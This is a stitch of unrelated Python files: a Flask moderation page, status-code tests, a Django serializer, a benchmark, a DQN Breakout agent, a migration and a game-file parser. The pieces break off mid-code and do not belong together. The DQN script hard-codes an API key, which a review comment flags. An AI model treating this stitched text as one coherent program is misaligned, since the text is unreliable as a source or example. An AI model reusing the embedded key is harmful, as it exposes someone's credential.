            stringio.write('<form action="takeaction.html" method="post" target="invisibleiframe">')
            stringio.write('<input type="submit" name="actiontotake" value="Signup" style="color:white;background-color:green">')
            # stringio.write('<input type="submit" name="actiontotake" value="Signup and checkin">')
            # stringio.write('<input type="submit" name="actiontotake" value="Relapse">')
            # stringio.write('<input type="submit" name="actiontotake" value="Reinstate">')
            stringio.write('<input type="submit" name="actiontotake" value="Skip comment">')
            stringio.write('<input type="submit" name="actiontotake" value="Skip comment and don\'t upvote">')
            # base64-encode the username so arbitrary characters survive
            # the round trip through the HTML form.
            stringio.write('<input type="hidden" name="username" value="' + b64encode(authorName) + '">')
            stringio.write('<input type="hidden" name="commenthash" value="' + commentHash + '">')
            # stringio.write('<input type="hidden" name="commentpermalink" value="' + comment.permalink + '">')
            stringio.write('</form>')

            # Render the comment body as sanitized HTML (paragraphs only).
            stringio.write(bleach.clean(markdown.markdown(comment.body.encode('utf-8')), tags=['p']))
            stringio.write("\n<br><br>\n\n")

    stringio.write('</html>')
    pageString = stringio.getvalue()
    stringio.close()
    return Response(pageString, mimetype='text/html')


@app.route('/takeaction.html', methods=["POST"])
def takeaction():
    """Handle a button press from the moderation page: run the chosen
    action on the comment, then retire its hash so it is not shown
    again.
    """
    # The username was base64-encoded when the form was rendered.
    username = b64decode(request.form["username"])
    commentHash = str(request.form["commenthash"])
    # commentPermalink = request.form["commentpermalink"]
    actionToTake = request.form["actiontotake"]
    # print commentHashesAndComments
    # Look the comment up in the map built by the last page render.
    comment = commentHashesAndComments[commentHash]
    # print "comment:  " + str(comment)
    if actionToTake == 'Signup':
        print "signup - " + username
        subprocess.call(['./signup.py', username])
        comment.upvote()
        retireCommentHash(commentHash)
    # if actionToTake == 'Signup and checkin':
    #     print "signup and checkin - " + username
    #     subprocess.call(['./signup-and-checkin.sh', username])
    #     comment.upvote()
    #     retireCommentHash(commentHash)
    # elif actionToTake == 'Relapse':
    #     print "relapse - " + username
    #     subprocess.call(['./relapse.py', username])
    #     comment.upvote()
    #     retireCommentHash(commentHash)
    # elif actionToTake == 'Reinstate':
    #     print "reinstate - " + username
    #     subprocess.call(['./reinstate.py', username])
    #     comment.upvote()
    #     retireCommentHash(commentHash)
    elif actionToTake == 'Skip comment':
        print "Skip comment - " + username
        comment.upvote()
        retireCommentHash(commentHash)
    elif actionToTake == "Skip comment and don't upvote":
        print "Skip comment and don't upvote - " + username
        retireCommentHash(commentHash)
    return Response("hello", mimetype='text/html')


@app.route('/copydisplayduringsignuptoclipboard.html', methods=["POST"])
def copydisplayduringsignuptoclipboard():
    """Run display-during-signup.py; copying its stdout to the
    clipboard is still a TODO.
    """
    print "TODO: Copy display to clipboard"
    subprocess.call(['./display-during-signup.py'])
    return Response("hello", mimetype='text/html')


if __name__ == '__main__':
    # Serve the moderation UI on localhost only.
    app.run(host='127.0.0.1', port=flaskport)


from flask_webapi import status
from unittest import TestCase


class TestStatus(TestCase):
    """Tests for the flask_webapi.status category predicates.

    Each predicate must accept its whole century block, endpoints
    included, and reject the codes immediately outside it.

    BUG FIX: the original loops used exclusive upper bounds like
    ``range(100, 199)``, so the top code of each category (199, 299,
    399, 499, 599) was never exercised.
    """

    def test_is_informational(self):
        self.assertFalse(status.is_informational(99))
        self.assertFalse(status.is_informational(200))

        # range() excludes its stop value; use 200 so 199 is covered.
        for i in range(100, 200):
            self.assertTrue(status.is_informational(i))

    def test_is_success(self):
        self.assertFalse(status.is_success(199))
        self.assertFalse(status.is_success(300))

        for i in range(200, 300):
            self.assertTrue(status.is_success(i))

    def test_is_redirect(self):
        self.assertFalse(status.is_redirect(299))
        self.assertFalse(status.is_redirect(400))

        for i in range(300, 400):
            self.assertTrue(status.is_redirect(i))

    def test_is_client_error(self):
        self.assertFalse(status.is_client_error(399))
        self.assertFalse(status.is_client_error(500))

        for i in range(400, 500):
            self.assertTrue(status.is_client_error(i))

    def test_is_server_error(self):
        self.assertFalse(status.is_server_error(499))
        self.assertFalse(status.is_server_error(600))

        for i in range(500, 600):
            self.assertTrue(status.is_server_error(i))

# Make the package in the parent directory importable without installing it.
import sys
sys.path.insert(0,'../')
from fast_guided_filter import blur

# Smoke test: reaching this line means the import above succeeded.
print("hello")

# from test_plus.test import TestCase
#
#
# class TestUser(TestCase):
#
#     def setUp(self):
#         self.user = self.make_user()
#
#     def test__str__(self):
#         self.assertEqual(
#             self.user.__str__(),
#             'testuser'  # This is the default username for self.make_user()
#         )
#
#     def test_get_absolute_url(self):
#         self.assertEqual(
#             self.user.get_absolute_url(),
#             '/users/testuser/'
#         )


from rest_framework import serializers
from django.contrib.auth.models import User

from dixit.account.models import UserProfile


class UserProfileSerializer(serializers.ModelSerializer):
    """Serializes UserProfile objects, exposing only the display name."""

    class Meta:
        model = UserProfile
        fields = ('name', )


class UserSerializer(serializers.ModelSerializer):
    """
    Serializes User objects
    """
    # Nested representation of the user's UserProfile.
    # NOTE(review): DRF nested serializers are read-only for writes
    # unless create()/update() are overridden -- confirm callers only
    # use this for reads.
    profile = UserProfileSerializer()

    class Meta:
        model = User
        fields = ('id', 'username', 'email', 'profile', )

# -*- coding: utf-8 -*-

import pack_command
import pack_command_python

import timeit
import cProfile
import pstats
import pycallgraph

def format_time(seconds):
    """Render a duration (given in seconds) using the largest unit --
    ns, μs, ms or sec -- whose value stays below 1000.
    """
    v = seconds
    if v * 1000 * 1000 * 1000 < 1000:
        return u'{} {}'.format(int(round(v * 1000 * 1000 * 1000)), u'ns')
    if v * 1000 * 1000 < 1000:
        return u'{} {}'.format(int(round(v * 1000 * 1000)), u'μs')
    if v * 1000 < 1000:
        # Milliseconds keep four decimal places instead of rounding to
        # an integer.
        return u'{} {}'.format(round(v * 1000, 4), u'ms')
    return u'{} {}'.format(int(v), u'sec')

# profiler size
number = 100000  # timed calls per repeat
sample = 7  # timeit repeats; the minimum of these is what gets reported

# profiler type: pick the instrumentation to run below.
profile = False  # cProfile statistics
graph = False  # pycallgraph PNG output
timer = True  # timeit comparison (the default)

def runit():
    # Benchmark body: one call into the Cython pack_command implementation.
    pack_command.pack_command("ZADD", "foo", 1369198341, 10000)

def runitp():
    # Benchmark body: the same call into the pure-Python implementation.
    pack_command_python.pack_command("ZADD", "foo", 1369198341, 10000)

if profile:
    # Collect cProfile stats around the section below.
    pr = cProfile.Profile()
    pr.enable()

if graph:
    pycallgraph.start_trace()

if timer:
    # Compare the pure-Python and Cython implementations; report the
    # fastest of `sample` repeats of `number` calls each.
    for name, t in (("Python", runitp), ("cython", runit)):
        res = timeit.Timer(t).repeat(sample, number)
        min_run = min(res)
        per_loop = min_run/number

        print u'{}'.format(name)
        print u'{} total run'.format(format_time(min_run))
        print u'{} per/loop'.format(format_time(per_loop))
        #print u'{} per/friend'.format(format_time(per_loop/friends_cnt))
else:
    # Not timing: just exercise the Cython version (useful under the
    # profiler or call-graph tracer).
    for j in xrange(number):
        runit()

if graph:
    pycallgraph.make_dot_graph('example.png')

if profile:
    pr.disable()
    ps = pstats.Stats(pr)
    sort_by = 'cumulative'
    ps.strip_dirs().sort_stats(sort_by).print_stats(20)

"""
Initialize Flask app

"""
from flask import Flask
import os
from flask_debugtoolbar import DebugToolbarExtension
from werkzeug.debug import DebuggedApplication

app = Flask('application')

# Select the settings object from the FLASK_CONF environment variable.
if os.getenv('FLASK_CONF') == 'DEV':
    # Development settings
    app.config.from_object('application.settings.Development')
    # Flask-DebugToolbar
    toolbar = DebugToolbarExtension(app)

    # Google app engine mini profiler
    # https://github.com/kamens/gae_mini_profiler
    app.wsgi_app = DebuggedApplication(app.wsgi_app, evalex=True)

    # Imported here, not at module top, so production never depends on
    # the profiler package.
    from gae_mini_profiler import profiler, templatetags

    @app.context_processor
    def inject_profiler():
        # Expose the profiler's HTML includes to every template.
        return dict(profiler_includes=templatetags.profiler_includes())
    app.wsgi_app = profiler.ProfilerWSGIMiddleware(app.wsgi_app)

elif os.getenv('FLASK_CONF') == 'TEST':
    app.config.from_object('application.settings.Testing')

else:
    # Default to production settings.
    app.config.from_object('application.settings.Production')

# Enable jinja2 loop controls extension
app.jinja_env.add_extension('jinja2.ext.loopcontrols')

# Pull in URL dispatch routes
import urls

#!/usr/bin/env python
import os
import sys

import django

from django.conf import settings


# Minimal Django configuration for running the pinax-hello test suite
# standalone: in-memory SQLite, no middleware.
DEFAULT_SETTINGS = dict(
    INSTALLED_APPS=[
        "django.contrib.auth",
        "django.contrib.contenttypes",
        "django.contrib.sites",
        "pinax.pinax_hello",
        "pinax.pinax_hello.tests"
    ],
    MIDDLEWARE_CLASSES=[],
    DATABASES={
        "default": {
            "ENGINE": "django.db.backends.sqlite3",
            "NAME": ":memory:",  # throwaway database per test run
        }
    },
    SITE_ID=1,
    ROOT_URLCONF="pinax.pinax_hello.tests.urls",
    SECRET_KEY="notasecret",  # fine for tests; never use in production
)


def runtests(*test_args):
    """Configure Django, run the given test labels (or the default
    pinax-hello suite when none are given), and exit the process with
    the number of failures as the status code.
    """
    if not settings.configured:
        settings.configure(**DEFAULT_SETTINGS)

    django.setup()

    # Make this script's directory importable so the test package
    # resolves regardless of the current working directory.
    parent = os.path.dirname(os.path.abspath(__file__))
    sys.path.insert(0, parent)

    try:
        from django.test.runner import DiscoverRunner
        runner_class = DiscoverRunner
        default_args = ["pinax.pinax_hello.tests"]
    except ImportError:
        # Very old Django (< 1.6): fall back to the legacy runner.
        from django.test.simple import DjangoTestSuiteRunner
        runner_class = DjangoTestSuiteRunner
        default_args = ["tests"]

    # BUG FIX: the original unconditionally overwrote `test_args`, so
    # labels passed on the command line were silently ignored.
    test_args = list(test_args) or default_args

    failures = runner_class(
        verbosity=1, interactive=True, failfast=False
    ).run_tests(test_args)
    sys.exit(failures)


if __name__ == "__main__":
    # Forward any command-line arguments as test labels.
    runtests(*sys.argv[1:])

import random
import numpy as np
import math
from time import perf_counter
import os
import sys
from collections import deque

import gym
import cntk
from cntk.layers import  Convolution, MaxPooling,  Dense
from cntk.models import Sequential, LayerStack
from cntk.initializer import glorot_normal


# Atari Breakout; observations are raw RGB screen frames.
env = gym.make("Breakout-v0")

NUM_ACTIONS = env.action_space.n
# Raw screen dimensions as reported by gym: (height, width, channels).
SCREEN_H_ORIG, SCREEN_W_ORIG, NUM_COLOUR_CHANNELS = env.observation_space.shape


def preprocess_image(screen_image):
    """Crop, downsample and grey-scale a raw screen frame.

    Accepts an (H, W, C) colour frame -- or an already single-channel
    (H, W) array, as used by the shape probe below -- and returns a
    (1, H', W') float array.
    """
    # crop the top and bottom
    screen_image = screen_image[35:195]

    # down sample by a factor of 2 in each spatial dimension
    screen_image = screen_image[::2, ::2]

    # convert to grey scale by averaging the colour channels.
    # Vectorized: the original filled the output with a per-pixel
    # Python double loop.  `np.float` (removed in NumPy 1.24) is
    # replaced by the builtin `float`.
    if screen_image.ndim == 3:
        grey_image = screen_image.mean(axis=2)
    else:
        # Single-channel input is already grey.
        grey_image = screen_image.astype(float)

    return np.array([grey_image.astype(float)])


# Run one dummy frame through preprocessing to learn the network input
# shape.  NOTE(review): the dummy is 2-D (no colour axis) while real
# frames are 3-D -- confirm preprocess_image handles both.
CHANNELS, IMAGE_H, IMAGE_W = preprocess_image(np.zeros((SCREEN_H_ORIG, SCREEN_W_ORIG))).shape
STATE_DIMS = (1, IMAGE_H, IMAGE_W)

class Brain:
    """Wraps the CNTK Q-network: model construction, training and
    prediction.
    """

    # Transitions per training minibatch.
    BATCH_SIZE = 5

    def __init__(self):

        #### Construct the model ####
        # `observation` is the network input (a preprocessed screen);
        # `q_target` carries the target Q-value per action.
        observation = cntk.ops.input_variable(STATE_DIMS, np.float32, name="s")
        q_target = cntk.ops.input_variable(NUM_ACTIONS, np.float32, name="q")

        # Define the structure of the neural network
        self.model = self.create_convolutional_neural_network(observation, NUM_ACTIONS)

        #### Define the trainer ####
        self.learning_rate = cntk.learner.training_parameter_schedule(0.0001, cntk.UnitType.sample)
        self.momentum = cntk.learner.momentum_as_time_constant_schedule(0.99)

        # Mean squared error between predicted and target Q-values.
        # NOTE(review): `self.loss` and `mean_error` are the identical
        # expression; presumably the eval metric was meant to differ --
        # confirm.
        self.loss =  cntk.ops.reduce_mean(cntk.ops.square(self.model - q_target), axis=0)
        mean_error = cntk.ops.reduce_mean(cntk.ops.square(self.model - q_target), axis=0)

        learner = cntk.adam_sgd(self.model.parameters, self.learning_rate, momentum=self.momentum)
        self.trainer = cntk.Trainer(self.model, self.loss, mean_error, learner)

    def train(self, x, y):
        """Run one minibatch update on inputs `x` with targets `y`.

        NOTE(review): the zip pairs `[y, x]` positionally with
        `self.loss.arguments`; this relies on the argument order CNTK
        reports -- verify it maps targets/observations correctly.
        """
        data = dict(zip(self.loss.arguments, [y, x]))
        self.trainer.train_minibatch(data, outputs=[self.loss.output])

    def predict(self, s):
        """Return the network's Q-value estimates for state `s`."""
        return self.model.eval([s])

    @staticmethod
    def create_multi_layer_neural_network(input_vars, out_dims, num_hidden_layers):
        """Build a fully-connected network: `num_hidden_layers` hidden
        layers of 128 ReLU units and a linear output layer.
        """

        num_hidden_neurons = 128

        hidden_layer = lambda: Dense(num_hidden_neurons, activation=cntk.ops.relu)
        output_layer = Dense(out_dims, activation=None)

        model = Sequential([LayerStack(num_hidden_layers, hidden_layer),
                            output_layer])(input_vars)
        return model

    @staticmethod
    def create_convolutional_neural_network(input_vars, out_dims):
        """Build the conv net: two conv+max-pool stages, a dense ReLU
        hidden layer, and a linear output layer.  (A third conv stage
        is defined but commented out of the stack below.)
        """

        convolutional_layer_1 = Convolution((5, 5), 32, strides=1, activation=cntk.ops.relu, pad=True,
                                            init=glorot_normal(), init_bias=0.1)
        pooling_layer_1 = MaxPooling((2, 2), strides=(2, 2), pad=True)

        convolutional_layer_2 = Convolution((5, 5), 64, strides=1, activation=cntk.ops.relu, pad=True,
                                            init=glorot_normal(), init_bias=0.1)
        pooling_layer_2 = MaxPooling((2, 2), strides=(2, 2), pad=True)

        convolutional_layer_3 = Convolution((5, 5), 128, strides=1, activation=cntk.ops.relu, pad=True,
                                            init=glorot_normal(), init_bias=0.1)
        pooling_layer_3 = MaxPooling((2, 2), strides=(2, 2), pad=True)

        fully_connected_layer = Dense(1024, activation=cntk.ops.relu, init=glorot_normal(), init_bias=0.1)

        output_layer = Dense(out_dims, activation=None, init=glorot_normal(), init_bias=0.1)

        model = Sequential([convolutional_layer_1, pooling_layer_1,
                            convolutional_layer_2, pooling_layer_2,
                            #convolutional_layer_3, pooling_layer_3,
                            fully_connected_layer,
                            output_layer])(input_vars)
        return model


class Memory:
    """Fixed-capacity replay buffer of experience samples."""

    def __init__(self, capacity):
        # deque with maxlen silently evicts the oldest entry when full
        self.examplers = deque(maxlen=capacity)
        self.capacity = capacity

    def add(self, sample):
        """Store one sample, discarding the oldest if at capacity."""
        self.examplers.append(sample)

    def get_random_samples(self, num_samples):
        """Return up to num_samples distinct samples chosen uniformly."""
        count = min(num_samples, len(self.examplers))
        return random.sample(tuple(self.examplers), count)

    def get_stack(self, start_index, stack_size):
        """Return stack_size consecutive samples stacked along a new last axis.

        When fewer than stack_size samples exist, the newest sample is
        repeated to pad; otherwise start_index is clamped so the stack
        fits inside the buffer.
        """
        last_valid_start = len(self.examplers) - stack_size
        if last_valid_start < 0:
            # Not enough samples yet: pad with copies of the newest one
            frames = list(self.examplers)
            frames += [self.examplers[-1]] * (-last_valid_start)
        else:
            begin = min(start_index, last_valid_start)
            frames = [self.examplers[begin + offset] for offset in range(stack_size)]
        return np.stack(frames, axis=-1)

    def get_random_stacks(self, num_samples, stack_size):
        """Return num_samples stacks built from random start positions."""
        starts = random.sample(range(len(self.examplers)), num_samples)
        return [self.get_stack(begin, stack_size) for begin in starts]

    def get_latest_stack(self, stack_size):
        """Return the stack that ends at the newest sample."""
        return self.get_stack(len(self.examplers), stack_size)


class Agent:
    """DQN agent: epsilon-greedy action selection, a replay memory, and
    experience-replay training against a Brain network."""

    MEMORY_CAPACITY = 100000
    DISCOUNT_FACTOR = 0.99
    MAX_EXPLORATION_RATE = 1.0
    MIN_EXPLORATION_RATE = 0.01
    DECAY_RATE = 0.0001

    def __init__(self):
        self.explore_rate = self.MAX_EXPLORATION_RATE
        self.brain = Brain()
        self.memory = Memory(self.MEMORY_CAPACITY)
        self.steps = 0

    def act(self, s):
        """Pick an action for state *s*: random with probability
        explore_rate, otherwise greedy w.r.t. the predicted Q-values."""
        if random.random() < self.explore_rate:
            return random.randint(0, NUM_ACTIONS - 1)
        return np.argmax(self.brain.predict(s))

    def observe(self, sample):
        """Record one (s, a, r, s') transition and decay exploration."""
        self.steps += 1
        self.memory.add(sample)

        # Exploration decays exponentially from MAX toward MIN with step count
        spread = self.MAX_EXPLORATION_RATE - self.MIN_EXPLORATION_RATE
        self.explore_rate = self.MIN_EXPLORATION_RATE + spread * math.exp(-self.DECAY_RATE * self.steps)

    def replay(self):
        """Train the brain on one random minibatch drawn from memory."""
        batch = self.memory.get_random_samples(self.brain.BATCH_SIZE)
        batch_len = len(batch)

        no_state = np.zeros(STATE_DIMS)
        states = np.array([sample[0] for sample in batch], dtype=np.float32)
        resultant_states = np.array(
            [no_state if sample[3] is None else sample[3] for sample in batch],
            dtype=np.float32)

        q_values_batch = self.brain.predict(states)
        future_q_values_batch = self.brain.predict(resultant_states)

        x = np.zeros((batch_len,) + STATE_DIMS, dtype=np.float32)
        y = np.zeros((batch_len, NUM_ACTIONS), dtype=np.float32)

        for i, (state, action, reward, resultant_state) in enumerate(batch):
            q_values = q_values_batch[0][i]
            if resultant_state is None:
                # Terminal transition: no future reward to bootstrap from
                q_values[action] = reward
            else:
                q_values[action] = reward + self.DISCOUNT_FACTOR * np.amax(future_q_values_batch[0][i])

            x[i] = state
            y[i] = q_values

        self.brain.train(x, y)

    @classmethod
    def action_from_output(cls, output_array):
        """Map a network output vector to the index of its best action."""
        return np.argmax(output_array)


def run_simulation(agent, solved_reward_level):
    """Play one episode in the global env, training the agent each step.

    Returns (total_rewards, time_step) once the episode terminates or the
    accumulated reward exceeds solved_reward_level.
    """
    state = preprocess_image(env.reset())
    total_rewards = 0
    time_step = 0

    while True:
        #env.render()
        time_step += 1

        action = agent.act(state.astype(np.float32))
        resultant_state, reward, done, info = env.step(action)
        resultant_state = preprocess_image(resultant_state)

        # Terminal states are stored as None so replay() can detect them
        if done:
            resultant_state = None

        agent.observe((state, action, reward, resultant_state))
        agent.replay()

        state = resultant_state
        total_rewards += reward

        if done or total_rewards > solved_reward_level:
            return total_rewards, time_step


def test(model_path, num_episodes=10):
    """Load the trained model at model_path and play num_episodes episodes.

    Bug fix: `done` was set to False only once, before the episode loop, so
    every episode after the first skipped its while-loop entirely. The
    reset of both `observation` and `done` now happens per episode.
    """
    root = cntk.load_model(model_path)
    for episode in range(num_episodes):
        observation = env.reset()  # reset environment for new episode
        done = False
        while not done:
            try:
                env.render()
            except Exception:
                # this might fail on a VM without OpenGL
                pass

            observation = preprocess_image(observation)
            action = np.argmax(root.eval(observation.astype(np.float32)))
            observation, reward, done, info = env.step(action)


if __name__ == "__main__":

    # Ensure we always get the same amount of randomness
    np.random.seed(0)

    # OpenAI Gym monitor/upload settings (upload disabled by default)
    GYM_ENABLE_UPLOAD = False
    GYM_VIDEO_PATH = os.path.join(os.getcwd(), "videos", "atari_breakout_dpn_cntk")
    # NOTE(review): hard-coded API key committed to source -- move this to an
    # environment variable and rotate the key before publishing.
    GYM_API_KEY = "sk_93AMQvdmReWCi8pdL4m6Q"

    MAX_NUM_EPISODES = 1000
    STREAK_TO_END = 120
    DONE_REWARD_LEVEL = 50

    TRAINED_MODEL_DIR = os.path.join(os.getcwd(), "trained_models")
    if not os.path.exists(TRAINED_MODEL_DIR):
        os.makedirs(TRAINED_MODEL_DIR)
    TRAINED_MODEL_NAME = "atari_breakout_dpn.mod"

    EPISODES_PER_PRINT_PROGRESS = 1
    EPISODES_PER_SAVE = 5

    # Train unless the script was invoked with the "test_only" argument
    if len(sys.argv) < 2 or sys.argv[1] != "test_only":

        if GYM_ENABLE_UPLOAD:
            env.monitor.start(GYM_VIDEO_PATH, force=True)

        agent = Agent()

        episode_number = 0
        num_streaks = 0
        reward_sum = 0
        time_step_sum = 0
        solved_episode = -1

        training_start_time = perf_counter()

        while episode_number < MAX_NUM_EPISODES:

            # Run the simulation and train the agent
            reward, time_step = run_simulation(agent, DONE_REWARD_LEVEL*2)
            reward_sum += reward
            time_step_sum += time_step

            # Periodic progress report; the running sums are reset after printing
            episode_number += 1
            if episode_number % EPISODES_PER_PRINT_PROGRESS == 0:
                t = perf_counter() - training_start_time
                print("(%d s) Episode: %d, Average reward = %.3f, Average number of time steps = %.3f."
                      % (t, episode_number, reward_sum / EPISODES_PER_PRINT_PROGRESS, time_step_sum/EPISODES_PER_PRINT_PROGRESS))
                reward_sum = 0
                time_step_sum = 0

            # An episode counts toward the streak when its reward exceeds DONE_REWARD_LEVEL
            if reward > DONE_REWARD_LEVEL:
                num_streaks += 1
                solved_episode = episode_number
            else:
                num_streaks = 0
                solved_episode = -1

            # Training stops early once solved more than STREAK_TO_END times in a row
            if num_streaks > STREAK_TO_END:
                print("Task solved in %d episodes and repeated %d times." % (episode_number, num_streaks))
                break

            # Periodic checkpoint of the model
            if episode_number % EPISODES_PER_SAVE == 0:
                agent.brain.model.save_model(os.path.join(TRAINED_MODEL_DIR, TRAINED_MODEL_NAME), False)

        # Final save after the training loop ends
        agent.brain.model.save_model(os.path.join(TRAINED_MODEL_DIR, TRAINED_MODEL_NAME), False)

        if GYM_ENABLE_UPLOAD:
            env.monitor.close()
            gym.upload(GYM_VIDEO_PATH, api_key=GYM_API_KEY)

    # testing the model
    test(os.path.join(TRAINED_MODEL_DIR, TRAINED_MODEL_NAME), num_episodes=10)

# A few example lists to iterate over.
the_count = [1, 2, 3, 4, 5]
fruits = ['apple', 'oranges', 'pears', 'apricots',]
change = [1, 'pennies', 2, 'dimes', 3, 'quarters',]

# A for-loop visits each element of a list in order.
for number in the_count:
    print("This is count %d" % number)

# The same pattern works for a list of strings.
for fruit in fruits:
    print("A fruit of type: %s" % fruit)

# Mixed-type lists work too; %r shows the repr of whatever is inside.
for i in change:
    print("I got %r " % i)

# Lists can also be built up incrementally, starting from an empty one
# and appending inside a loop over a range of numbers.
elements = []
for i in range(0, 6):
    print("Adding %d to the list." % i)
    elements.append(i)

# Finally, print the list we just built.
for i in elements:
    print("Element was: %d" % i)

"""adding timestamps to all tables

Revision ID: c0a714ade734
Revises: 1a886e694fca
Create Date: 2016-04-20 14:46:06.407765

"""

# revision identifiers, used by Alembic.
revision = 'c0a714ade734'
down_revision = '1a886e694fca'
branch_labels = None
depends_on = None

from alembic import op
import sqlalchemy as sa

def upgrade(engine_name):
    """Dispatch to the engine-specific upgrade function in this module."""
    globals()["upgrade_{0}".format(engine_name)]()


def downgrade(engine_name):
    """Dispatch to the engine-specific downgrade function in this module."""
    globals()["downgrade_{0}".format(engine_name)]()


def upgrade_validation():
    """Add nullable created_at/updated_at DateTime columns to every
    validation-database table (originally auto generated by Alembic)."""
    timestamped_tables = (
        'field_type',
        'file_columns',
        'file_type',
        'multi_field_rule',
        'multi_field_rule_type',
        'rule',
        'rule_timing',
        'rule_type',
        'tas_lookup',
    )
    # Same column-add order as the generated commands: created_at first,
    # then updated_at, table by table.
    for table in timestamped_tables:
        op.add_column(table, sa.Column('created_at', sa.DateTime(), nullable=True))
        op.add_column(table, sa.Column('updated_at', sa.DateTime(), nullable=True))


def downgrade_validation():
    """Drop the timestamp columns added by upgrade_validation, in the
    reverse table order (originally auto generated by Alembic)."""
    for table in (
        'tas_lookup',
        'rule_type',
        'rule_timing',
        'rule',
        'multi_field_rule_type',
        'multi_field_rule',
        'file_type',
        'file_columns',
        'field_type',
    ):
        # updated_at is dropped before created_at, matching the generated commands
        op.drop_column(table, 'updated_at')
        op.drop_column(table, 'created_at')

from cStringIO import StringIO
from struct import pack, unpack, error as StructError
from .log import log
from .structures import fields


class DBFile(object):
	"""
	Base class for WDB and DBC files
	"""

	@classmethod
	def open(cls, file, build, structure, environment):
		"""
		Open a database file and return a parsed instance.
		`file` may be a path string (Python 2 basestring) or an open
		file-like object; `structure` describes the row layout.
		"""
		if isinstance(file, basestring):
			file = open(file, "rb")

		instance = cls(file, build, environment)
		# _readHeader, setStructure and _readAddresses are expected to be
		# provided by the concrete subclass (WDB / DBC) -- not defined here
		instance._readHeader()
		instance.setStructure(structure)
		instance._rowDynamicFields = 0 # Dynamic fields index, used when parsing a row
		instance._readAddresses()

		return instance

	def __init__(self, file=None, build=None, environment=None):
		self._addresses = {} # row id -> (address, reclen) in the file
		self._values = {} # row id -> parsed DBRow, filled lazily
		self.file = file
		self.build = build
		self.environment = environment

	def __repr__(self):
		return "%s(file=%r, build=%r)" % (self.__class__.__name__, self.file, self.build)

	def __contains__(self, id):
		return id in self._addresses

	def __getitem__(self, item):
		# Slicing returns a list of rows, in sorted id order
		if isinstance(item, slice):
			keys = sorted(self._addresses.keys())[item]
			return [self[k] for k in keys]

		# Rows are parsed lazily on first access and cached in _values
		if item not in self._values:
			self._parse_row(item)

		return self._values[item]

	def __setitem__(self, item, value):
		if not isinstance(item, int):
			raise TypeError("DBFile indices must be integers, not %s" % (type(item)))

		if isinstance(value, DBRow):
			self._values[item] = value
			self._addresses[item] = -1 # -1 marks an in-memory row with no file address
		else:
			# FIXME technically we should allow DBRow, but this is untested and will need resetting parent
			raise TypeError("Unsupported type for DBFile.__setitem__: %s" % (type(value)))

	def __delitem__(self, item):
		# Drop the cached row (if it was parsed) and its address entry
		if item in self._values:
			del self._values[item]
		del self._addresses[item]

	def __iter__(self):
		return self._addresses.__iter__()

	def __len__(self):
		return len(self._addresses)

	def _add_row(self, id, address, reclen):
		"""Register the file address of row `id` (called while reading addresses)."""
		if id in self._addresses: # Something's wrong here
			log.warning("Multiple instances of row %r found in %s" % (id, self.file.name))
		self._addresses[id] = (address, reclen)

	def _parse_field(self, data, field, row=None):
		"""
		Parse a single field in stream.
		Returns the parsed value, or None when the field does not exist in
		this row or could not be unpacked.
		"""
		if field.dyn > self._rowDynamicFields:
			return None # The column doesn't exist in this row, we set it to None

		ret = None
		try:
			if isinstance(field, fields.StringField):
				ret = self._parse_string(data)

			elif isinstance(field, fields.DataField): # wowcache.wdb
				# Variable-length blob: its length is stored in the master field
				length = getattr(row, field.master)
				ret = data.read(length)

			elif isinstance(field, fields.DynamicMaster):
				# The master field holds how many dynamic columns this row has
				ret, = unpack("<I", data.read(4))
				self._rowDynamicFields = ret

			else:
				# Fixed-size field: little-endian, format char supplied by the field
				ret, = unpack("<%s" % (field.char), data.read(field.size))
		except StructError:
			log.warning("Field %s could not be parsed properly" % (field))
			ret = None

		return ret

	def supportsSeeking(self):
		"""Return True if the underlying file object supports seek()."""
		return hasattr(self.file, "seek")

	def append(self, row):
		"""
		Append a row at the end of the file.
		If the row does not have an id, one is automatically assigned.
		"""
		i = len(self) + 1 # FIXME this wont work properly in incomplete files
		if "_id" not in row:
			row["_id"] = i
		self[i] = row

	def clear(self):
		"""
		Delete every row in the file
		"""
		for k in self.keys(): # Use key, otherwise we get RuntimeError: dictionary changed size during iteration
			del self[k]

	def keys(self):
		"""Return the ids of every row present in the file."""
		return self._addresses.keys()

	def items(self):
		"""Return (id, row) pairs for every row (forces parsing of all rows)."""
		return [(k, self[k]) for k in self]

	def parse_row(self, data, reclen=0):
		"""
		Assign data to a DBRow instance
		"""
		return DBRow(self, data=data, reclen=reclen)

	def values(self):
		"""
		Return a list of the file's values
		"""
		return [self[id] for id in self]

	def setRow(self, key, **values):
		"""Create a row from keyword column values and store it at `key`."""
		self.__setitem__(key, DBRow(self, columns=values))

	def size(self):
		"""
		Return the size of the underlying file in bytes.
		NOTE(review): `file` below is the Python 2 builtin type; this
		branch has no equivalent on Python 3.
		"""
		if hasattr(self.file, "size"):
			return self.file.size()
		elif isinstance(self.file, file):
			from os.path import getsize
			return getsize(self.file.name)
		raise NotImplementedError

	def update(self, other):
		"""
		Update file from iterable other
		"""
		for k in other:
			self[k] = other[k]

	def write(self, filename=""):
		"""
		Write the file data on disk. If filename is not given, use currently opened file.
		"""
		_filename = filename or self.file.name

		data = self.header.data() + self.data() + self.eof()

		f = open(_filename, "wb") # Don't open before calling data() as uncached rows would be empty
		f.write(data)
		f.close()
		log.info("Written %i bytes at %s" % (len(data), f.name))

		if not filename: # Reopen self.file, we modified it
			# XXX do we need to wipe self._values here?
			self.file.close()
			self.file = open(f.name, "rb")


class DBRow(list):
	"""
	A database row.
	Names of the variables of that class should not be used in field names of structures
	"""
	initialized = False

	def __init__(self, parent, data=None, columns=None, reclen=0):
		"""
		Build a row for `parent`, either from `columns` (a list of raw
		values or a dict of column name -> value) or by parsing the raw
		`data` string; `reclen`, when given, is the expected record length
		used for a sanity check after parsing.
		"""
		self._parent = parent
		self._values = {} # Columns values storage
		self.structure = parent.structure

		self.initialized = True # needed for __setattr__

		if columns:
			if type(columns) == list:
				self.extend(columns)

			elif type(columns) == dict:
				# Start from default values, then fill in the named columns
				self._default()
				_cols = [k.name for k in self.structure]
				for k in columns:
					try:
						self[_cols.index(k)] = columns[k]
					except ValueError:
						log.warning("Column %r not found" % (k))

		elif data:
			dynfields = 0
			data = StringIO(data)
			for field in self.structure:
				_data = parent._parse_field(data, field, self)
				self.append(_data)

			if reclen:
				real_reclen = reclen + self._parent.row_header_size
				# The amount actually read should match the declared record length
				if data.tell() != real_reclen:
					log.warning("Reclen not respected for row %r. Expected %i, read %i. (%+i)" % (self.id, real_reclen, data.tell(), real_reclen-data.tell()))

	def __dir__(self):
		result = self.__dict__.keys()
		result.extend(self.structure.column_names)
		return result

	def __getattr__(self, attr):
		# Attribute access resolves, in order: structure columns,
